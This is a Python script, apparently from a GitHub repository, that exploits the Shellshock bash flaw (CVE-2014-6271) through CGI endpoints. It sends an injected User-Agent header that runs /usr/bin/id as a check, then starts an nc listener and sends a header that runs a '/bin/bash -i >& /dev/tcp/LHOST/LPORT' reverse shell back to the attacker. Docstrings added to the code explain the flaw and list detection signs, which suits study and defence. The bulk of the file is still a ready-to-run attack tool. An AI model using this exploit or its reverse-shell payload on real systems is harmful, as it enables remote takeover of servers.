shellshock_exploit.py
#!/usr/bin/env python3
# Coded by: Jsmoreira02
# https://github.com/Jsmoreira02
from requests import get
from argparse import ArgumentParser
from subprocess import Popen
from time import sleep
# ANSI SGR escape sequences for coloured terminal output.
# 9x selects a bright foreground colour, ";1" adds bold, and "0" resets.
# Cyan wraps the banner.
code_cyan_bold = "\033[96;1m"
# Green marks the positive check result and the closing messages.
code_green_bold = "\033[92;1m"
# Red marks the negative check result and the invalid-URL message.
code_red_bold = "\033[91;1m"
# Returns the terminal to its default attributes after a coloured span.
code_reset = "\033[0m"
def arguments():
    """Parse the three positional command-line arguments.

    Returns:
        A ``(url, LHOST, LPORT)`` tuple of strings read from ``sys.argv``.

    All three values are accepted as free text: nothing here checks that the
    URL is well formed, that LHOST is an address, or that LPORT is a number
    in the valid port range.
    """
    cli = ArgumentParser(
        description="Exploit [CVE-2014-6271]",
        epilog="Usage: python3 exploit.py http://target/cgi-bin/test.cgi hackerIP 443",
    )
    positionals = (
        ("url", "<URL>", "URL path to shellshock vulnerability"),
        ("LHOST", "<LHOST>", "Local HOST"),
        ("LPORT", "<LPORT>", "Local PORT"),
    )
    for dest, placeholder, description in positionals:
        cli.add_argument(dest, metavar=placeholder, type=str, help=description)
    parsed = cli.parse_args()
    return parsed.url, parsed.LHOST, parsed.LPORT
def logo():
    """Return the multi-line block-character banner printed at start-up.

    The text starts with a blank line and every row ends with a newline.
    It is purely cosmetic.
    """
    rows = (
        "\n ██████ ██░ ██ ▓█████ ██▓ ██▓ ██████ ██░ ██ ▒█████ ▄████▄ ██ ▄█▀\n",
        " ▒██ ▒ ▓██░ ██▒▓█ ▀ ▓██▒ ▓██▒ ▒██ ▒ ▓██░ ██▒▒██▒ ██▒▒██▀ ▀█ ██▄█▒\n",
        " ░ ▓██▄ ▒██▀▀██░▒███ ▒██░ ▒██░ ░ ▓██▄ ▒██▀▀██░▒██░ ██▒▒▓█ ▄ ▓███▄░\n",
        " ▒ ██▒░▓█ ░██ ▒▓█ ▄ ▒██░ ▒██░ ▒ ██▒░▓█ ░██ ▒██ ██░▒▓▓▄ ▄██▒▓██ █▄\n",
        " ▒██████▒▒░▓█▒░██▓░▒████▒░██████▒░██████▒▒██████▒▒░▓█▒░██▓░ ████▓▒░▒ ▓███▀ ░▒██▒ █▄\n",
        " ▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓ ░░ ▒░▓ ░▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒░ ▒░▒░▒░ ░ ░▒ ▒ ░▒ ▒▒ ▓▒\n",
        " ░ ░▒ ░ ░ ▒ ░▒░ ░ ░ ░ ░░ ░ ▒ ░░ ░ ▒ ░░ ░▒ ░ ░ ▒ ░▒░ ░ ░ ▒ ▒░ ░ ▒ ░ ░▒ ▒░\n",
        " ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ▒ ░ ░ ░░ ░\n",
    )
    return "".join(rows)
def check_CVE(url):
    """Send one probe request and report whether the reply shows CVE-2014-6271.

    CVE-2014-6271 (Shellshock) is the bash flaw in which commands placed after
    a function definition in an environment variable's value are run when bash
    imports that variable. CGI hands request headers to the handler as
    environment variables, which is why the probe travels in ``User-Agent``.
    The probe asks for the output of ``/usr/bin/id``, so this is an active
    check: on a vulnerable host it causes a command to run.

    Args:
        url: Address of the CGI endpoint to probe.

    Returns:
        A coloured one-line status message ending in a newline.

    Review notes:
        * The positive match is the exact uid/gid 33 ``www-data`` line, so a
          vulnerable handler running as any other account is reported as not
          vulnerable. A negative result is not evidence that bash is patched.
        * No timeout is passed to ``get``, so an unresponsive server blocks
          the call, and request exceptions are not caught here.
        * For detection, the header value begins with the literal ``() {``,
          which appears in access logs that record the User-Agent.
    """
    probe_headers = {"User-Agent": "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id"}
    reply = get(url=url, headers=probe_headers)

    expected_id_line = "uid=33(www-data) gid=33(www-data) groups=33(www-data)"
    if expected_id_line not in reply.text:
        return f"{code_red_bold}[X]{code_reset}" + " The target don't appear to be vulnerable\n"
    return f"{code_green_bold}[!]{code_reset}" + " The target is vulnerable!\n"
def exploit(url, lhost, lport):
    """Print the banner, run the probe, start a listener and send the request.

    Steps, in order: print the banner and title, print the result of
    ``check_CVE(url)``, start ``nc`` listening on ``lport``, then issue a GET
    whose ``User-Agent`` carries a bash function definition followed by a
    command that opens an interactive bash connected back to ``lhost:lport``.

    Args:
        url: CGI endpoint that receives the request.
        lhost: Address the remote bash is told to connect to.
        lport: Port for both the local listener and the connect-back.

    Returns:
        A coloured closing message; a different one if Ctrl+C interrupted the
        listener start or the request.

    Review notes:
        * The title string names the Apache HTTP Server, but CVE-2014-6271 is
          a GNU bash flaw; Apache CGI is only the path by which the header
          reaches bash. The fix is a patched bash, not a web-server change.
        * The ``check_CVE`` result is only printed; the request is sent
          whatever it says.
        * The ``Popen`` handle is discarded, so the listener is never waited
          on or terminated by this script.
        * ``lhost`` and ``lport`` are interpolated into the command text
          without validation, and ``get`` is called without a timeout.
        * Detection: a request header starting with ``() {``, and a web-server
          child process spawning bash that opens an outbound TCP connection.
    """
    wide_rule = "=" * 85
    narrow_rule = "=" * 35
    title = "[CVE-2014-6271] exploitable vulnerability in the Apache HTTP Server"

    print(" \n" + wide_rule)
    print(f"{code_cyan_bold}{logo()}{code_reset}")
    print(title.center(82) + "\n")
    print(wide_rule + "\n")

    connect_back = f"/bin/bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"
    trigger_headers = {"User-Agent": "() { :; };" + connect_back}

    sleep(1)
    print(check_CVE(url))

    try:
        # Listener runs as a separate process; its handle is not kept.
        Popen(["nc","-lp",f"{lport}"])
        sleep(1)
        print(narrow_rule)
        print("Spawning your shell...")
        print(narrow_rule + "\n")
        get(url=url, headers=trigger_headers)
    except KeyboardInterrupt:
        return f"\n\n{code_green_bold}Ctrl+C detected! Finished!{code_reset}"
    return f"\n\n{code_green_bold}Finished!{code_reset}"
def main():
    """Read the CLI arguments, confirm the URL answers 200, then run exploit().

    Returns:
        An error message when the first GET does not return status 200,
        otherwise an empty string once ``exploit`` has run and its closing
        message has been printed.

    Review notes:
        The reachability GET has no timeout and no exception handling, so a
        refused or hanging connection surfaces as an unhandled requests error.
    """
    target, lhost, lport = arguments()

    reachable = get(url=target).status_code == 200
    if not reachable:
        return f"\n{code_red_bold}[X]{code_reset} Invalid URL! Are you sure this is the correct path?\n"

    print(exploit(target, lhost, lport))
    return ""
# Entry point: main() returns the final status text, which is printed here
# (an empty string after a completed run, so a blank line is emitted).
if __name__ == '__main__':
    outcome = main()
    print(outcome)